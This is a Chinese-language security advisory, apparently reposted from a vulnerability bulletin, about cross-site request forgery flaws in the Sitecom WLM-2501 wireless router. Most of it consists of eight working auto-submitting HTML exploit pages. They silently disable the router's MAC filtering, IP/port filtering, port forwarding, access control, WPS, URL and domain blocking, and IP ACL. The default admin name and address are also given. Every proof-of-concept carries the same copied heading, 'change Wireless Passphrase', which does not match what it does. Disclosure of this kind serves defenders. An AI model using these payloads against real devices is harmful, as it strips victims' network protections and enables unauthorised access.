发布日期:2012-03-21
更新日期:2012-03-27受影响系统:
Sitecom WLM-2501
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 52700Sitecom WLM-2501是无线调制解调器路由器300N,使用Web管理界面,默认监听在TCP/IP端口80,默认管理员是admin,默认ip地址是192.168.0.1。Sitecom WLM-2501在实现上存在多个跨站请求伪造漏洞,攻击者可利用这些漏洞非法访问受影响设备并执行某些管理员操作,更改下列路由器参数:- Disable Mac Filtering
- Disable/Modify IP/Port Filtering
- Disable/Modify Port Forwarding
- Disable/Modify Wireless Access Control
- Disable Wi-Fi Protected Setup
- Disable/Modify URL Blocking Filter
- Disable/Modify Domain Blocking Filter
- Disable/Modify IP Address ACL
- Change Wireless Passphrase
- Enable/Modify Remote Access (also on WAN interface)<*来源:Ivano Binetti
链接:http://www.webapp-security.com/2012/03/sitecom-wlm-2501-multiple-csrf-vulnerabilities/
http://www.linuxidc.com/Linux/2012-03/57585.htm
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!Ivano Binetti ()提供了如下测试方法:
3.1 Disable Mac Filtering
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" name="form0" action="http://192.168.0.1:80/goform/admin/formFilter">
<input type="hidden" name="outAct" value="1"/>
<input type="hidden" name="inAct" value="1"/>
<input type="hidden" name="setMacDft" value="Apply"/>
<input type="hidden" name="submit-url" value="/fw-macfilter.asp"/>
</form>
</body>
</html>
3.2 Disable IP/Port Filtering
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" name="form0" action="http://192.168.0.1:80/goform/formFilter">
<input type="hidden" name="outAct" value="1"/>
<input type="hidden" name="inAct" value="1"/>
<input type="hidden" name="setDefaultAction" value="Apply"/>
<input type="hidden" name="submit-url" value="/fw-ipportfilter.asp"/>
</form>
</body>
</html>
3.3 Disable Port Forwarding
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" name="form0" action="http://192.168.0.1:80/goform/formPortFw">
<input type="hidden" name="portFwcap" value="0"/>
<input type="hidden" name="apply" value="Apply"/>
<input type="hidden" name="select_id" value=""/>
<input type="hidden" name="submit-url" value="/fw-portfw.asp"/>
</form>
</body>
</html>
3.4 Disable Wireless Access Control
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" name="form0" action="http://192.168.0.1:80/goform/admin/formWlAc">
<input type="hidden" name="wlanAcEnabled" value="0"/>
<input type="hidden" name="setFilterMode" value="Apply"/>
<input type="hidden" name="submit-url" value="/wlactrl.asp"/>
</form>
</body>
</html>
3.5 Disable Wi-Fi Protected Setup
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" name="form0" action="http://192.168.0.1:80/goform/formWsc">
<input type="hidden" name="wlanDisabled" value="OFF"/>
<input type="hidden" name="disableWPS" value="ON"/>
<input type="hidden" name="submit-url" value="/wlwps.asp"/>
<input type="hidden" name="save" value="Apply"/>
</form>
</body>
</html>
3.6 Disable URL Blocking Filter
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" name="form0" action="http://192.168.0.1:80/goform/formURL">
<input type="hidden" name="urlcap" value="0"/>
<input type="hidden" name="apply" value="Apply"/>
<input type="hidden" name="urlFQDN" value=""/>
<input type="hidden" name="Keywd" value=""/>
<input type="hidden" name="submit-url" value="/url_blocking.asp"/>
</form>
</body>
</html>
3.7 Disable Domain Blocking Filter
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" name="form0" action="http://192.168.0.1:80/goform/formDOMAINBLK">
<input type="hidden" name="domainblkcap" value="0"/>
<input type="hidden" name="apply" value="Apply"/>
<input type="hidden" name="blkDomain" value=""/>
<input type="hidden" name="submit-url" value="/domainblk.asp"/>
</form>
</body>
</html>
3.8 Disable IP Address ACL Filter
<html>
<body onload="javascript:document.forms[0].submit()">
<H2>CSRF Exploit to change Wireless Passphrase</H2>
<form method="POST" name="form0" action="http://192.168.0.1:80/goform/admin/formACL">
<input type="hidden" name="lan_ip" value="192.168.0.1"/>
<input type="hidden" name="lan_mask" value="255.255.255.0"/>
<input type="hidden" name="aclcap" value="0"/>
<input type="hidden" name="apply" value="Apply"/>
<input type="hidden" name="enable" value="1"/>
<input type="hidden" name="interface" value="0"/>
<input type="hidden" name="aclIP" value=""/>
<input type="hidden" name="aclMask" value=""/>
<input type="hidden" name="submit-url" value="/acl.asp"/>
</form>
</body>
</html>
+---------------------------------------------建议:
--------------------------------------------------------------------------------
厂商补丁:Sitecom
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:http://www.sitecom.com/wireless-modem-router-300n/p/859PHP PDORow对象远程拒绝服务漏洞Real Networks RealPlayer ".mp4"文件内存破坏漏洞相关资讯 Sitecom WLM-2501 本文评论 查看全部评论 (0)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
|
易网时代-编程资源站